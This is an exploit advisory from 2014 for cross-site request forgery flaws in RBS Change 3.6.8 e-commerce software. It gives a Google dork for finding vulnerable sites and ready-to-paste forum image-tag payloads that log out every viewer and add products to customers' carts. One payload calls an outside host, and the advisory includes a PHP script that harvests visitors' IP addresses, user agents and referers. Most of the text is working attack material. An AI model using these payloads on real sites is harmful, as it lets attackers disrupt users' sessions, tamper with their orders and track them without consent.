# Exploit Title: RBS Change Complet Open Source CSRF# Google Dork: intext:"une réalisation rbs"# Date: 10/01/2014# Exploit Author: KrustyHack# Vendor Homepage: http://www.rbschange.fr/# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html# Version: 3.6.8# Tested on: Linux
HOW TO
======
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
TEST
====
Based on demo.rbschange.fr:---------------------------[img="http://server/fr/deconnexion/"][/img]
Will disconnect all users who load the image.
Other example:--------------[img="http://www.example.com/log.php"][/img]<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("log.txt","[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip -$rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
?>
To get users ip, user agent,...
DESCRIPTION
===========
Add a product to a customer basket with an image tag and without any verification.
HOW TO
======
Just add [img="/action/order/AddToCart?shopId=13159&productId=13312"][/img] on forum signature or forum posts.
